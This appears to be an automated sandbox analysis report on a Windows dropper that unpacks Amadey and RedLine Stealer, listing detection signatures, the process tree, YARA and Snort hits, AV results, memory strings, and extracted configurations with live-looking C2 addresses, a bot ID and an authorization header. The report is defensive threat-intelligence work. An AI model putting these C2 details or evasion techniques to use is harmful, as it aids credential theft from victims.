Windows Analysis Report
qu0t4ukLoN.exe

Overview

General Information

Sample Name: qu0t4ukLoN.exe
Original Sample Name: 1df346c349b9b71b11825690be73e635.exe
Analysis ID: 876163
MD5: 1df346c349b9b71b11825690be73e635
SHA1: 13df3b1666b674f48b1fc2a836fee8ce99381fb5
SHA256: 8e96ef86e327dd3bbc1dab16ce1e57e8f380d9b2df919158f1b6786cfd6f717e
Tags: exe, RedLineStealer
Infos:

Detection

Amadey, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadey's stealer DLL
Antivirus detection for dropped file
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Disable Windows Defender real time protection (registry)
Connects to many ports of the same IP (likely port scanning)
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • qu0t4ukLoN.exe (PID: 4908 cmdline: C:\Users\user\Desktop\qu0t4ukLoN.exe MD5: 1DF346C349B9B71B11825690BE73E635)
    • v7020033.exe (PID: 5988 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe MD5: A9A0FDF699EB764206C59FF3CA3FAC53)
      • v6434086.exe (PID: 2336 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe MD5: 4D67FD4D3D62A45215D1FBDF9CA87397)
        • a4758283.exe (PID: 6988 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe MD5: 1BE37E0816A88025F557178CA7FC03C8)
          • conhost.exe (PID: 6104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • AppLaunch.exe (PID: 6072 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
        • b7687179.exe (PID: 3320 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe MD5: 927C5B1DEF98D855184A0ED56D8A2787)
  • rundll32.exe (PID: 5760 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5116 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5296 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

{"C2 url": "77.91.68.62/wings/game/index.php", "Version": "3.83"}
{"C2 url": "83.97.73.122:19062", "Bot Id": "misa", "Authorization Header": "9e79529a6bdb4962f44d12b0d6d62d32"}

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0xd00:$pat14: , CommandLine:
  • 0x140e6:$v2_1: ListOfProcesses
  • 0x13e9a:$v4_3: base64str
  • 0x14b69:$v4_4: stringKey
  • 0x1269c:$v4_5: BytesToStringConverted
  • 0x113ef:$v4_6: FromBase64
  • 0x12bd4:$v4_8: procName
C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000006.00000000.361157707.0000000000E82000.00000002.00000001.01000000.00000008.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Process Memory Space: b7687179.exe PID: 3320 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
1.3.v7020033.exe.4d85c20.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
2.3.v6434086.exe.4c3f81e.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
2.3.v6434086.exe.4c3f81e.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0xd00:$pat14: , CommandLine:
  • 0x140e6:$v2_1: ListOfProcesses
  • 0x13e9a:$v4_3: base64str
  • 0x14b69:$v4_4: stringKey
  • 0x1269c:$v4_5: BytesToStringConverted
  • 0x113ef:$v4_6: FromBase64
  • 0x12bd4:$v4_8: procName
1.3.v7020033.exe.4d85c20.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
2.3.v6434086.exe.4c3f81e.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

No Sigma rule has matched

Timestamp: 05/26/23-11:40:50.159297
SID: 2043231
Source IP: 192.168.2.3
Source Port: 49697
Destination IP: 83.97.73.122
Destination Port: 19062
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/26/23-11:40:32.455619
SID: 2043233
Source IP: 192.168.2.3
Source Port: 49697
Destination IP: 83.97.73.122
Destination Port: 19062
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/26/23-11:40:36.975680
SID: 2043234
Source IP: 83.97.73.122
Source Port: 19062
Destination IP: 192.168.2.3
Destination Port: 49697
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exe | Avira: detection malicious, Label: HEUR/AGEN.1311185
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe | Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe | Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe | Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe | Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "83.97.73.122:19062", "Bot Id": "misa", "Authorization Header": "9e79529a6bdb4962f44d12b0d6d62d32"}
Source: 1.3.v7020033.exe.4d85c20.0.raw.unpack | Malware Configuration Extractor: Amadey {"C2 url": "77.91.68.62/wings/game/index.php", "Version": "3.83"}
Source: qu0t4ukLoN.exe | ReversingLabs: Detection: 52%
Source: qu0t4ukLoN.exe | Virustotal: Detection: 52%
Source: qu0t4ukLoN.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe | ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe | ReversingLabs: Detection: 69%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe | ReversingLabs: Detection: 38%
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe | ReversingLabs: Detection: 77%
Source: qu0t4ukLoN.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\d4851931.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\c6803120.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\qu0t4ukLoN.exe | Code function: 0_2_00A92F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00A92F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe | Code function: 1_2_00212F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00212F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe | Code function: 2_2_00BC2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00BC2F1D
Source: qu0t4ukLoN.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: qu0t4ukLoN.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: qu0t4ukLoN.exe, v7020033.exe.0.dr, v6434086.exe.1.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: v7020033.exe, 00000001.00000003.357315003.0000000004D41000.00000004.00000020.00020000.00000000.sdmp, v7020033.exe, 00000001.00000003.357393527.00000000030CD000.00000004.00000020.00020000.00000000.sdmp, c6803120.exe.1.dr
Source: Binary string: wextract.pdbGCTL source: qu0t4ukLoN.exe, v7020033.exe.0.dr, v6434086.exe.1.dr
Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: a4758283.exe, 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmp, a4758283.exe, 00000003.00000003.360898057.0000000000472000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.383174563.0000000004182000.00000020.00000400.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\qu0t4ukLoN.exe | Code function: 0_2_00A92390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A92390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exe | Code function: 1_2_00212390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00212390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exe | Code function: 2_2_00BC2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00BC2390

Networking

Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49697 -> 83.97.73.122:19062
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49697 -> 83.97.73.122:19062
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 83.97.73.122:19062 -> 192.168.2.3:49697
Source: global traffic | TCP traffic: 83.97.73.122 ports 19062,0,1,2,6,9
Source: Malware configuration extractor | URLs: 77.91.68.62/wings/game/index.php
Source: Malware configuration extractor | URLs: 83.97.73.122:19062
Source: Joe Sandbox View | ASN Name: UNACS-AS-BG8000BurgasBG
Source: Joe Sandbox View | IP Address: 83.97.73.122
Source: global traffic | TCP traffic: 192.168.2.3:49697 -> 83.97.73.122:19062
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://ocsp.digicert.com0
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://ocsp.digicert.com0C
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://ocsp.digicert.com0X
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
